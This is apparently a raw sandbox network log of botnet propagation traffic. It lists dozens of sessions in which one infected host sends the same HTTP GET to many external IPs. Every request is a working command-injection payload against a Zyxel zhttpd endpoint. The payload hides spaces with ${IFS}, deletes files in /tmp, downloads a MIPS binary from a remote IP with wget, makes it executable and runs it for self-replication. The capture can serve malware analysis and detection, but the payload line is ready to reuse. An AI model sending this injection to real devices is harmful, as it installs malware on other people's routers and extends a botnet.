                                                Jan 12, 2024 18:24:36.872114897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4600192.168.2.134659068.183.145.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872143984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4601192.168.2.1338732117.11.98.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872183084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4602192.168.2.1348330141.130.93.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872219086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4603192.168.2.133544061.122.152.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872261047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4604192.168.2.135134247.89.124.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872291088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4605192.168.2.1351216161.146.13.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872318029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4606192.168.2.1336010110.0.180.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872349024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4607192.168.2.134523087.183.235.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872406960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4608192.168.2.1359930133.125.192.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872428894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4609192.168.2.1337002124.138.210.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872477055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4610192.168.2.133761258.81.163.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872525930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4611192.168.2.133288675.102.139.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872596979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4612192.168.2.13550582.173.64.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872602940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4613192.168.2.1344016178.183.126.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872602940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4614192.168.2.1352656134.89.3.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872629881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4615192.168.2.134409684.126.218.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872673988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4616192.168.2.134802236.51.212.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872709990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4617192.168.2.133425452.23.122.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872735023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4618192.168.2.134108614.206.240.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872788906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4619192.168.2.1334412143.244.153.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872811079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4620192.168.2.1335472207.173.211.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872862101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4621192.168.2.134985641.44.174.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872888088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4622192.168.2.134663853.184.16.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872915983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4623192.168.2.1344388185.236.149.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.872970104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4624192.168.2.1353530223.147.140.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873013973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4625192.168.2.134410035.49.154.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873055935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4626192.168.2.135390276.234.171.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873083115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4627192.168.2.1351124166.203.91.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873130083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4628192.168.2.1357108132.119.4.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873167992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4629192.168.2.1337892221.114.83.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873208046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4630192.168.2.134177083.56.200.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873256922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4631192.168.2.1349526217.229.82.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873286009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4632192.168.2.1334414135.109.122.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873320103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4633192.168.2.133772698.89.108.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873343945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4634192.168.2.133825287.236.62.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873377085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4635192.168.2.1355500208.181.188.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873430967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4636192.168.2.1343416120.67.115.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873461962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4637192.168.2.134555825.0.122.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873485088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4638192.168.2.1358592180.128.213.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873533010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4639192.168.2.1350630117.151.12.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873568058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4640192.168.2.1337194149.60.206.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873610973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4641192.168.2.1341420199.71.36.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873639107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4642192.168.2.1342202132.52.158.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873671055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4643192.168.2.134209620.194.231.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873693943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4644192.168.2.1349492222.137.243.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873747110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4645192.168.2.1339494170.136.137.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873789072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4646192.168.2.1334958149.236.76.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873825073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4647192.168.2.1335420222.214.241.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873867989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4648192.168.2.134125071.37.195.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873902082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4649192.168.2.1349182195.203.53.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873933077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4650192.168.2.1337356211.74.72.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.873974085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4651192.168.2.1339934222.192.50.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874010086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4652192.168.2.1350458182.55.219.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874034882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4653192.168.2.1338472107.149.26.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874083996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4654192.168.2.1334860106.102.92.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874121904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4655192.168.2.133628697.199.234.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874162912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4656192.168.2.133339086.206.49.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874192953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4657192.168.2.1344292223.50.146.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874241114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4658192.168.2.1358252119.180.130.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874303102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4659192.168.2.1347372119.18.13.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874336958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4660192.168.2.135254450.200.41.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874383926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4661192.168.2.134297437.77.86.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:36.874423027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4662192.168.2.134222836.11.20.172443
                                                TimestampBytes transferredDirectionData
